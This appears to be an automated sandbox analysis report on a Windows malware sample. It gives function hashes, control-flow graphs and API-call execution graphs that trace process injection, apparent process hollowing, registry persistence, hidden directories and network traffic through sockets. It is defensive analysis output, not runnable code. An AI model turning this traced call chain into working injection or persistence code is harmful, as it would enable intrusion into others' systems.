                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction ID: 17d089ca0b4e70fdaeb14ece6449512be2b7796a19621dff44204cea98d145bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction Fuzzy Hash: C0412671410334FEDB22AFB08D48FAB76BDFF40705F404595AE45EA058DA379688CEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02222A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 652 2222a38-2222a3e call 2223677 lstrcat 655 2222a44-2222a67 call 2222b71 call 222351b 652->655 659 2222a6c-2222a73 655->659 659->655 660 2222a75-2222a91 call 2223463 call 22226a7 659->660 665 2222a93 660->665 666 2222abe-2222ad5 call 22226a7 660->666 665->666 667 2222a95-2222aaa call 222271d 665->667 672 2222b02-2222b19 call 22226a7 666->672 673 2222ad7 666->673 667->666 674 2222aac 667->674 680 2222b1b 672->680 681 2222b1c-2222b35 call 2222ebb 672->681 673->672 675 2222ad9-2222aee call 222271d 673->675 674->666 678 2222aae-2222ab8 DeleteFileA 674->678 675->672 684 2222af0 675->684 678->666 680->681 687 2222b37-2222b40 call 222307b 681->687 688 2222b58-2222b6c Sleep 681->688 684->672 686 2222af2-2222afc DeleteFileA 684->686 686->672 687->688 691 2222b42-2222b52 DeleteFileA 687->691 688->659 691->688
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02222A2F), ref: 02222A3E
                                                                                                                                                                            • Part of subcall function 02222B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02222C68
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02222AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02222B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02222B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction ID: ec3373aa2e6459d79794d0ade7b6bb596e71d27d6e105a2a61b6ffdb88c7402d
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: 32311471510278FEDB226EB08D48FAB76BCFF40709F4045A5AE45E6058DA379688CEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 022231EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0222320E
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 0222324C
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022231D9,00000011,?,00000000,00000000), ref: 02223279
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,022231D9,00000011,?,00000000,00000000,00000000,02223092,00000004,00000000), ref: 02223285
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,022231D9,00000011,?,00000000,00000000,00000000,02223092,00000004,00000000), ref: 02223291
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: e66513f883e40e7130df8de76f2ca85639338634a9e547b9cec1badff5e3bea7
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 55115472410628AFDF12AFA0CC48AEFB3FDEF40305F014595E985EA008DA365A84CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02223F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02223F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02223F51
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02223F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02223F6F
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02223F7F
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02223F8F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2220000_java.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction ID: 99fc45ef342004446b545e3e3666aca3e85716af4b2dfe20613f2248af36f115
                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction Fuzzy Hash: ADF01270564360FAFF50FFF0AC4C6593AB99F00704F0404D0A949AD09DCF7A81588E75
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:18.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                          Signature Coverage:4.1%
                                                                                                                                                                          Total number of Nodes:614
                                                                                                                                                                          Total number of Limit Nodes:10
                                                                                                                                                                          execution_graph 3073 47e3e9e 3074 47e3ea1 3073->3074 3077 47e3ec3 3074->3077 3076 47e3ebd 3078 47e3653 3077->3078 3079 47e3ec8 LoadLibraryA 3078->3079 3080 47e3eee 3079->3080 3081 47e3ed2 3079->3081 3104 47e3f0d 3080->3104 3083 47e0c9c GetProcAddress 3081->3083 3084 47e3ee4 3083->3084 3096 47e409a 3084->3096 3086 47e3ee9 3086->3076 3087 47e3f03 3088 47e3f3b 3087->3088 3089 47e3f2b GetModuleHandleA 3087->3089 3091 47e3f46 Sleep 3088->3091 3115 47e401b 3089->3115 3092 47e3f78 3091->3092 3093 47e3f56 Sleep 3092->3093 3094 47e3f78 3093->3094 3095 47e3f66 Sleep 3094->3095 3095->3086 3097 47e409f 3096->3097 3098 47e1345 3 API calls 3097->3098 3099 47e40bd 3098->3099 3100 47e1345 3 API calls 3099->3100 3101 47e40d6 3100->3101 3102 47e1345 3 API calls 3101->3102 3103 47e40ef 3102->3103 3103->3086 3105 47e3f12 3104->3105 3106 47e3f3b 3105->3106 3107 47e3f2b GetModuleHandleA 3105->3107 3110 47e3f46 Sleep 3106->3110 3108 47e401b 3 API calls 3107->3108 3109 47e3f39 3108->3109 3109->3087 3111 47e3f78 3110->3111 3112 47e3f56 Sleep 3111->3112 3113 47e3f78 3112->3113 3114 47e3f66 Sleep 3113->3114 3114->3109 3116 47e402e 3115->3116 3117 47e4096 3116->3117 3118 47e409a 3 API calls 3116->3118 3117->3086 3118->3117 2457 47e2f3f 2458 47e2f44 2457->2458 2459 47e2f4a lstrlen 2458->2459 2460 47e2f61 2459->2460 2470 47e2f88 2460->2470 2462 47e2fee send 2464 47e2ffe 2462->2464 2465 47e3042 closesocket 2462->2465 2463 47e2f76 2463->2462 2466 47e3001 send 2464->2466 2467 47e301e 2464->2467 2466->2464 2466->2465 2468 47e3026 recv 2467->2468 2469 47e3040 2467->2469 2468->2465 2468->2467 2469->2465 2471 47e2f8d 2470->2471 2472 47e2fee send 2471->2472 2473 47e2ffe 2472->2473 2474 47e3042 closesocket 2472->2474 2475 47e3001 send 2473->2475 2477 47e301e 2473->2477 2474->2463 2475->2473 2475->2474 2476 47e3026 recv 2476->2474 2476->2477 2477->2476 2478 47e3040 2477->2478 2478->2474 2930 47e487c 2931 47e4897 2930->2931 2934 47e47ef 2931->2934 2933 47e48a5 2935 47e4807 2934->2935 2936 47e276c 19 API calls 2935->2936 2937 47e4823 2935->2937 2936->2937 2937->2933 2952 47e495d 2953 47e4970 2952->2953 2954 47e49ae CreateEventA 2953->2954 2955 47e4a63 2953->2955 2956 47e49d1 2954->2956 2956->2955 2957 47e4d53 WaitForSingleObject 2956->2957 2957->2956 3119 47e3e9a 3120 47e3653 3119->3120 3121 47e3e9f GetProcAddress 3120->3121 3122 47e3eaa 3121->3122 3123 47e3ed4 3121->3123 3125 47e3ebd 3122->3125 3126 47e3ec3 13 API calls 3122->3126 3124 47e0c9c GetProcAddress 3123->3124 3127 47e3ee4 3124->3127 3126->3125 3128 47e409a 3 API calls 3127->3128 3129 47e3ee9 3128->3129 3043 47e2f38 3044 47e2f3d 3043->3044 3045 47e2fee send 3044->3045 3046 47e2ffe 3045->3046 3047 47e3042 closesocket 3045->3047 3048 47e3001 send 3046->3048 3049 47e301e 3046->3049 3048->3046 3048->3047 3050 47e3026 recv 3049->3050 3051 47e3040 3049->3051 3050->3047 3050->3049 3051->3047 2938 47e1676 2939 47e16ad 2938->2939 2940 47e1688 2938->2940 2941 47e0de0 3 API calls 2940->2941 2941->2939 3052 47e2535 3053 47e3653 3052->3053 3054 47e253a ExpandEnvironmentStringsA 3053->3054 3055 47e2572 2 API calls 3054->3055 3056 47e2553 3054->3056 3055->3056 3057 47e25b8 3056->3057 3058 47e25c7 ExpandEnvironmentStringsA 3056->3058 3059 47e255e 3056->3059 3057->3058 3060 47e25d6 3058->3060 3059->3060 3061 47e2563 lstrcat lstrcat 3059->3061 3062 47e25dd lstrcat 3060->3062 3063 47e25e6 3060->3063 3062->3063 3064 47e25e2 3062->3064 3065 47e261c 10 API calls 3063->3065 3066 47e260c 3065->3066 3067 47e2597 10 API calls 3066->3067 3068 47e2634 3067->3068 2958 47e2dcf 2959 47e3653 2958->2959 2960 47e2dd4 CryptAcquireContextA 2959->2960 2961 47e2dee CryptImportPublicKeyInfo 2960->2961 2962 47e2e91 2960->2962 2963 47e2e83 CryptReleaseContext 2961->2963 2964 47e2e10 CryptCreateHash 2961->2964 2963->2962 2965 47e2e77 CryptDestroyKey 2964->2965 2966 47e2e33 CryptHashData 2964->2966 2965->2963 2967 47e2e4d CryptVerifySignatureA 2966->2967 2968 47e2e6b CryptDestroyHash 2966->2968 2967->2968 2968->2965 2479 47e292d 2511 47e3653 2479->2511 2481 47e2932 LoadLibraryA 2513 47e0c9c 2481->2513 2483 47e2948 WSAStartup 2483->2483 2484 47e2961 VirtualAlloc 2483->2484 2484->2484 2485 47e2979 2484->2485 2516 47e25e8 2485->2516 2489 47e2a07 2491 47e2a19 lstrcat 2489->2491 2490 47e299d 2490->2489 2492 47e29ab lstrcat 2490->2492 2496 47e2a20 2491->2496 2493 47e25e8 10 API calls 2492->2493 2495 47e29c1 2493->2495 2494 47e2b4d inet_addr gethostbyname Sleep 2494->2496 2497 47e29dd 44 API calls 2495->2497 2496->2494 2498 47e34f7 19 API calls 2496->2498 2508 47e2a51 2496->2508 2499 47e29d4 2497->2499 2498->2496 2500 47e29e2 lstrcat 2499->2500 2502 47e29f8 2500->2502 2501 47e343f 26 API calls 2501->2508 2503 47e2a14 38 API calls 2502->2503 2503->2489 2504 47e2683 CreateFileA GetFileSize ReadFile CloseHandle 2504->2508 2505 47e26f9 CreateFileA SetFilePointer WriteFile CloseHandle 2505->2508 2506 47e2a8a DeleteFileA 2506->2508 2507 47e2ace DeleteFileA 2507->2508 2508->2501 2508->2504 2508->2505 2508->2506 2508->2507 2509 47e2b34 Sleep 2508->2509 2510 47e2b1e DeleteFileA 2508->2510 2509->2496 2510->2509 2512 47e3665 2511->2512 2512->2481 2512->2512 2514 47e0ca2 GetProcAddress 2513->2514 2514->2514 2515 47e0cc0 2514->2515 2515->2483 2517 47e25f6 2516->2517 2545 47e261c 2517->2545 2519 47e260c 2561 47e2597 2519->2561 2521 47e2634 2522 47e29a6 2521->2522 2523 47e3653 2522->2523 2524 47e29ab lstrcat 2523->2524 2525 47e25e8 10 API calls 2524->2525 2526 47e29c1 2525->2526 2578 47e29dd 2526->2578 2528 47e29d4 2529 47e29e2 lstrcat 2528->2529 2530 47e29f8 2529->2530 2531 47e2a14 38 API calls 2530->2531 2532 47e2a07 2531->2532 2533 47e2a19 lstrcat 2532->2533 2534 47e2a20 2533->2534 2535 47e2b4d inet_addr gethostbyname Sleep 2534->2535 2536 47e34f7 19 API calls 2534->2536 2541 47e2a51 2534->2541 2535->2534 2536->2534 2537 47e343f 26 API calls 2537->2541 2538 47e2683 CreateFileA GetFileSize ReadFile CloseHandle 2538->2541 2539 47e26f9 CreateFileA SetFilePointer WriteFile CloseHandle 2539->2541 2540 47e2a8a DeleteFileA 2540->2541 2541->2537 2541->2538 2541->2539 2541->2540 2542 47e2ace DeleteFileA 2541->2542 2543 47e2b34 Sleep 2541->2543 2544 47e2b1e DeleteFileA 2541->2544 2542->2541 2543->2534 2544->2543 2546 47e3653 2545->2546 2547 47e2621 ExpandEnvironmentStringsA 2546->2547 2548 47e262c 2547->2548 2549 47e2636 2547->2549 2550 47e2634 2548->2550 2551 47e2597 5 API calls 2548->2551 2552 47e266c lstrcat 2549->2552 2570 47e265e 2549->2570 2550->2519 2551->2550 2552->2550 2555 47e265d lstrcat 2555->2552 2556 47e26b9 2557 47e26c8 ReadFile 2556->2557 2558 47e26e9 CloseHandle 2556->2558 2557->2558 2559 47e26e5 2557->2559 2560 47e26f5 2558->2560 2559->2558 2560->2519 2575 47e25c6 2561->2575 2563 47e25bb 2564 47e25de lstrcat 2563->2564 2565 47e25e6 2563->2565 2564->2521 2566 47e261c 9 API calls 2565->2566 2567 47e260c 2566->2567 2568 47e2597 9 API calls 2567->2568 2569 47e2634 2568->2569 2569->2521 2571 47e3653 2570->2571 2572 47e2663 lstrcat 2571->2572 2573 47e266c lstrcat 2572->2573 2574 47e2659 2573->2574 2574->2555 2574->2556 2576 47e3653 2575->2576 2577 47e25cb ExpandEnvironmentStringsA lstrcat 2576->2577 2577->2563 2579 47e3653 2578->2579 2580 47e29e2 lstrcat 2579->2580 2581 47e29f8 2580->2581 2596 47e2a14 2581->2596 2583 47e2a07 2584 47e2a19 lstrcat 2583->2584 2585 47e2a20 2584->2585 2586 47e2b4d inet_addr gethostbyname Sleep 2585->2586 2587 47e34f7 19 API calls 2585->2587 2594 47e2a51 2585->2594 2586->2585 2587->2585 2588 47e343f 26 API calls 2588->2594 2589 47e2683 CreateFileA GetFileSize ReadFile CloseHandle 2589->2594 2590 47e2a8a DeleteFileA 2590->2594 2591 47e26f9 CreateFileA SetFilePointer WriteFile CloseHandle 2591->2594 2592 47e2ace DeleteFileA 2592->2594 2593 47e2b34 Sleep 2593->2585 2594->2588 2594->2589 2594->2590 2594->2591 2594->2592 2594->2593 2595 47e2b1e DeleteFileA 2594->2595 2595->2593 2597 47e3653 2596->2597 2598 47e2a19 lstrcat 2597->2598 2599 47e2a20 2598->2599 2607 47e2a51 2599->2607 2610 47e2b4d 2599->2610 2616 47e34f7 2599->2616 2603 47e2683 CreateFileA GetFileSize ReadFile CloseHandle 2603->2607 2604 47e2a8a DeleteFileA 2604->2607 2605 47e26f9 CreateFileA SetFilePointer WriteFile CloseHandle 2605->2607 2606 47e2ace DeleteFileA 2606->2607 2607->2603 2607->2604 2607->2605 2607->2606 2608 47e2b34 Sleep 2607->2608 2609 47e2b1e DeleteFileA 2607->2609 2619 47e343f CreateToolhelp32Snapshot 2607->2619 2608->2599 2609->2608 2614 47e2b5e 2610->2614 2611 47e2bd0 inet_addr 2612 47e2be4 gethostbyname 2611->2612 2611->2614 2612->2614 2613 47e2c41 Sleep 2613->2613 2613->2614 2614->2611 2614->2613 2615 47e2cf7 2614->2615 2615->2599 2630 47e3522 2616->2630 2620 47e345c Process32First 2619->2620 2621 47e34f4 2619->2621 2622 47e34ed CloseHandle 2620->2622 2623 47e347d VirtualAlloc 2620->2623 2621->2607 2622->2621 2623->2623 2625 47e3495 2623->2625 2624 47e3497 lstrcat 2624->2625 2625->2624 2626 47e34b5 2625->2626 2627 47e34cc lstrlen 2625->2627 2626->2622 2628 47e276c 19 API calls 2627->2628 2629 47e34df VirtualFree 2628->2629 2629->2622 2631 47e3527 2630->2631 2634 47e276c 2631->2634 2633 47e351a 2635 47e277d VirtualAlloc 2634->2635 2635->2635 2636 47e2791 2635->2636 2637 47e25e8 10 API calls 2636->2637 2638 47e27be 2637->2638 2645 47e27da 2638->2645 2640 47e27d1 2641 47e27df lstrcat 2640->2641 2642 47e27e6 2641->2642 2644 47e27fd VirtualFree 2642->2644 2651 47e26f9 CreateFileA 2642->2651 2644->2633 2646 47e3653 2645->2646 2647 47e27df lstrcat 2646->2647 2648 47e27e6 2647->2648 2649 47e26f9 4 API calls 2648->2649 2650 47e27fd VirtualFree 2648->2650 2649->2648 2650->2640 2652 47e271f SetFilePointer 2651->2652 2653 47e2768 2651->2653 2654 47e275c CloseHandle 2652->2654 2655 47e273c WriteFile 2652->2655 2653->2642 2654->2653 2655->2654 2656 47e2758 2655->2656 2656->2654 2942 47e0b6b GetWindowThreadProcessId OpenProcess 2943 47e0b8e 2942->2943 2944 47e0bac 2942->2944 2945 47e0de0 3 API calls 2943->2945 2946 47e08b3 97 API calls 2944->2946 2947 47e0b99 2945->2947 2948 47e0bb1 2946->2948 2947->2944 2950 47e0ba4 ExitProcess 2947->2950 2949 47e0c3f GetPEB 2948->2949 2951 47e0bb6 2949->2951 2969 47e3d46 2970 47e3653 2969->2970 2971 47e3d4b LoadLibraryA 2970->2971 2972 47e0c9c GetProcAddress 2971->2972 2973 47e3d61 2972->2973 2992 47e3d86 2973->2992 2976 47e0c9c GetProcAddress 2977 47e3da1 2976->2977 2978 47e1345 3 API calls 2977->2978 2979 47e3dba 2978->2979 2980 47e1345 3 API calls 2979->2980 2981 47e3dd3 2980->2981 2982 47e1345 3 API calls 2981->2982 2983 47e3dec 2982->2983 2984 47e1345 3 API calls 2983->2984 2985 47e3e05 2984->2985 2986 47e1345 3 API calls 2985->2986 2987 47e3e1e 2986->2987 2988 47e1345 3 API calls 2987->2988 2989 47e3e37 2988->2989 2990 47e1345 3 API calls 2989->2990 2991 47e3e50 2990->2991 2993 47e3653 2992->2993 2994 47e3d8b LoadLibraryA 2993->2994 2995 47e3da1 2994->2995 2996 47e0c9c GetProcAddress 2994->2996 2997 47e1345 3 API calls 2995->2997 2996->2995 2998 47e3dba 2997->2998 2999 47e1345 3 API calls 2998->2999 3000 47e3dd3 2999->3000 3001 47e1345 3 API calls 3000->3001 3002 47e3dec 3001->3002 3003 47e1345 3 API calls 3002->3003 3004 47e3e05 3003->3004 3005 47e1345 3 API calls 3004->3005 3006 47e3e1e 3005->3006 3007 47e1345 3 API calls 3006->3007 3008 47e3e37 3007->3008 3009 47e1345 3 API calls 3008->3009 3010 47e3d7e LoadLibraryA 3009->3010 3010->2976 3011 47e2546 3012 47e2549 3011->3012 3027 47e2572 3012->3027 3014 47e2553 3015 47e25b8 3014->3015 3016 47e25c7 ExpandEnvironmentStringsA 3014->3016 3017 47e255e 3014->3017 3015->3016 3018 47e25d6 3016->3018 3017->3018 3019 47e2563 lstrcat lstrcat 3017->3019 3020 47e25dd lstrcat 3018->3020 3021 47e25e6 3018->3021 3020->3021 3022 47e25e2 3020->3022 3023 47e261c 10 API calls 3021->3023 3024 47e260c 3023->3024 3025 47e2597 10 API calls 3024->3025 3026 47e2634 3025->3026 3028 47e3653 3027->3028 3029 47e2577 lstrcat lstrcat 3028->3029 3029->3014 3030 47e48c6 3031 47e48e1 3030->3031 3032 47e47ef 19 API calls 3031->3032 3033 47e48ef 3032->3033 3034 47e31c6 3035 47e31cb 3034->3035 3036 47e2597 10 API calls 3035->3036 3037 47e31e9 lstrcat 3036->3037 3038 47e31f6 3037->3038 3039 47e26f9 4 API calls 3038->3039 3040 47e3218 3039->3040 3041 47e321e GetStartupInfoA CreateProcessA CloseHandle CloseHandle 3040->3041 3042 47e3276 3040->3042 3041->3042 2657 47e0b65 2658 47e3653 2657->2658 2659 47e0b6a FindWindowA 2658->2659 2660 47e0bac 2659->2660 2661 47e0b74 GetWindowThreadProcessId OpenProcess 2659->2661 2676 47e08b3 2660->2676 2661->2660 2663 47e0b8e 2661->2663 2671 47e0de0 VirtualAllocEx 2663->2671 2666 47e0b99 2666->2660 2668 47e0b9d 2666->2668 2668->2660 2669 47e0ba4 ExitProcess 2668->2669 2672 47e0e45 2671->2672 2673 47e0e10 WriteProcessMemory 2671->2673 2672->2666 2673->2672 2674 47e0e2e 2673->2674 2674->2672 2675 47e0e60 CreateRemoteThread 2674->2675 2675->2672 2679 47e08b9 2676->2679 2689 47e08d9 2679->2689 2699 47e0cc4 2689->2699 2755 47e0c3f GetPEB 2699->2755 2701 47e0cc9 2702 47e0c9c GetProcAddress 2701->2702 2703 47e08e5 2702->2703 2704 47e14bc 2703->2704 2757 47e14de 2704->2757 2707 47e0c9c GetProcAddress 2708 47e14f9 2707->2708 2773 47e1345 2708->2773 2711 47e1345 3 API calls 2712 47e152b 2711->2712 2713 47e1345 3 API calls 2712->2713 2714 47e1544 2713->2714 2715 47e1345 3 API calls 2714->2715 2716 47e155d 2715->2716 2717 47e1345 3 API calls 2716->2717 2718 47e1576 2717->2718 2719 47e1345 3 API calls 2718->2719 2720 47e08ea 2719->2720 2721 47e0643 CreateMutexA 2720->2721 2780 47e067c 2721->2780 2724 47e0697 2726 47e2597 10 API calls 2724->2726 2725 47e0c9c GetProcAddress 2725->2724 2727 47e06a6 2726->2727 2806 47e06c2 2727->2806 2730 47e0726 SetFileAttributesA 2731 47e25e8 10 API calls 2730->2731 2732 47e0746 CreateDirectoryA SetFileAttributesA 2731->2732 2734 47e2597 10 API calls 2732->2734 2733 47e06d7 lstrcmpiA 2735 47e080f CreateThread 2733->2735 2736 47e06f9 Sleep 2733->2736 2737 47e0779 CreateDirectoryA SetFileAttributesA 2734->2737 2747 47e0ce8 2735->2747 2928 47e28bd 2735->2928 2738 47e2501 2736->2738 2739 47e079d VirtualAlloc 2737->2739 2740 47e0713 CreateDirectoryA 2738->2740 2739->2739 2741 47e07b5 2739->2741 2740->2730 2825 47e2683 CreateFileA 2741->2825 2744 47e07f4 2832 47e0811 2744->2832 2745 47e26f9 4 API calls 2745->2744 2748 47e0d03 CreateToolhelp32Snapshot 2747->2748 2748->2748 2749 47e0d12 Sleep Process32First 2748->2749 2750 47e0db5 FindCloseChangeNotification Sleep 2749->2750 2752 47e0d47 2749->2752 2750->2748 2751 47e0d8e Process32Next 2751->2750 2751->2752 2752->2751 2753 47e0de0 3 API calls 2752->2753 2754 47e0d88 FindCloseChangeNotification 2753->2754 2754->2751 2756 47e0c4b 2755->2756 2756->2701 2756->2756 2758 47e14e3 2757->2758 2759 47e0c9c GetProcAddress 2758->2759 2760 47e14f9 2759->2760 2761 47e1345 3 API calls 2760->2761 2762 47e1512 2761->2762 2763 47e1345 3 API calls 2762->2763 2764 47e152b 2763->2764 2765 47e1345 3 API calls 2764->2765 2766 47e1544 2765->2766 2767 47e1345 3 API calls 2766->2767 2768 47e155d 2767->2768 2769 47e1345 3 API calls 2768->2769 2770 47e1576 2769->2770 2771 47e1345 3 API calls 2770->2771 2772 47e14d8 2771->2772 2772->2707 2774 47e13eb 2773->2774 2775 47e1358 2773->2775 2774->2711 2775->2774 2776 47e1364 VirtualProtect 2775->2776 2776->2774 2777 47e137c VirtualAlloc 2776->2777 2777->2777 2778 47e1391 2777->2778 2779 47e13ad VirtualProtect 2778->2779 2779->2774 2781 47e3653 2780->2781 2782 47e0681 LoadLibraryA 2781->2782 2783 47e0c9c GetProcAddress 2782->2783 2784 47e0697 2783->2784 2785 47e2597 10 API calls 2784->2785 2786 47e06a6 2785->2786 2787 47e06c2 87 API calls 2786->2787 2788 47e06b9 2787->2788 2789 47e0726 SetFileAttributesA 2788->2789 2792 47e06d7 lstrcmpiA 2788->2792 2790 47e25e8 10 API calls 2789->2790 2791 47e0746 CreateDirectoryA SetFileAttributesA 2790->2791 2793 47e2597 10 API calls 2791->2793 2794 47e0673 LoadLibraryA 2792->2794 2795 47e06f9 Sleep 2792->2795 2796 47e0779 CreateDirectoryA SetFileAttributesA 2793->2796 2794->2724 2794->2725 2797 47e2501 2795->2797 2798 47e079d VirtualAlloc 2796->2798 2799 47e0713 CreateDirectoryA 2797->2799 2798->2798 2800 47e07b5 2798->2800 2799->2789 2801 47e2683 4 API calls 2800->2801 2802 47e07cc 2801->2802 2803 47e07f4 2802->2803 2804 47e26f9 4 API calls 2802->2804 2805 47e0811 87 API calls 2803->2805 2804->2803 2805->2794 2807 47e06c7 2806->2807 2808 47e06d7 lstrcmpiA 2807->2808 2809 47e06b9 2808->2809 2810 47e06f9 Sleep 2808->2810 2809->2730 2809->2733 2811 47e2501 2810->2811 2812 47e0713 CreateDirectoryA 2811->2812 2813 47e0726 SetFileAttributesA 2812->2813 2814 47e25e8 10 API calls 2813->2814 2815 47e0746 CreateDirectoryA SetFileAttributesA 2814->2815 2816 47e2597 10 API calls 2815->2816 2817 47e0779 CreateDirectoryA SetFileAttributesA 2816->2817 2818 47e079d VirtualAlloc 2817->2818 2818->2818 2819 47e07b5 2818->2819 2820 47e2683 4 API calls 2819->2820 2821 47e07cc 2820->2821 2822 47e07f4 2821->2822 2823 47e26f9 4 API calls 2821->2823 2824 47e0811 88 API calls 2822->2824 2823->2822 2824->2809 2826 47e26a8 GetFileSize 2825->2826 2827 47e07cc 2825->2827 2828 47e26e9 CloseHandle 2826->2828 2829 47e26c1 2826->2829 2827->2744 2827->2745 2828->2827 2829->2828 2830 47e26c8 ReadFile 2829->2830 2830->2828 2831 47e26e5 2830->2831 2831->2828 2854 47e086e 2832->2854 2834 47e08ad 2834->2735 2836 47e08d9 93 API calls 2838 47e08d5 2836->2838 2837 47e0863 2839 47e08d9 2837->2839 2840 47e0866 RegCreateKeyExA 2837->2840 2838->2839 2842 47e0cc4 2 API calls 2839->2842 2845 47e0885 RegSetValueExA RegCloseKey 2840->2845 2841 47e08b9 2841->2836 2844 47e08e5 2842->2844 2846 47e14bc 4 API calls 2844->2846 2845->2834 2847 47e08ea 2846->2847 2848 47e0643 93 API calls 2847->2848 2849 47e08ef CreateThread 2848->2849 2850 47e0ce8 10 API calls 2849->2850 2926 47e28bd 2849->2926 2851 47e090b 2850->2851 2852 47e0911 2851->2852 2859 47e093e 2852->2859 2855 47e3653 2854->2855 2856 47e0873 RegCreateKeyExA 2855->2856 2857 47e0885 RegSetValueExA RegCloseKey 2856->2857 2858 47e0840 2857->2858 2858->2834 2858->2837 2858->2841 2860 47e0cc4 2 API calls 2859->2860 2861 47e094a 2860->2861 2862 47e14bc 4 API calls 2861->2862 2863 47e094f 2862->2863 2864 47e0954 Sleep RtlExitUserThread OpenMutexA 2863->2864 2865 47e098f GetStartupInfoA 2864->2865 2866 47e0af1 2864->2866 2880 47e09d9 2865->2880 2866->2852 2868 47e0a3d DuplicateHandle 2869 47e0aec 2868->2869 2870 47e0a82 WriteProcessMemory 2868->2870 2894 47e0af3 2869->2894 2870->2869 2872 47e0ab0 ResumeThread 2870->2872 2871 47e0a3c 2871->2868 2875 47e0ac1 Sleep OpenMutexA 2872->2875 2874 47e09d2 2874->2868 2874->2871 2876 47e09de CreateProcessA 2874->2876 2875->2866 2877 47e0ae7 2875->2877 2876->2869 2878 47e09ee GetThreadContext 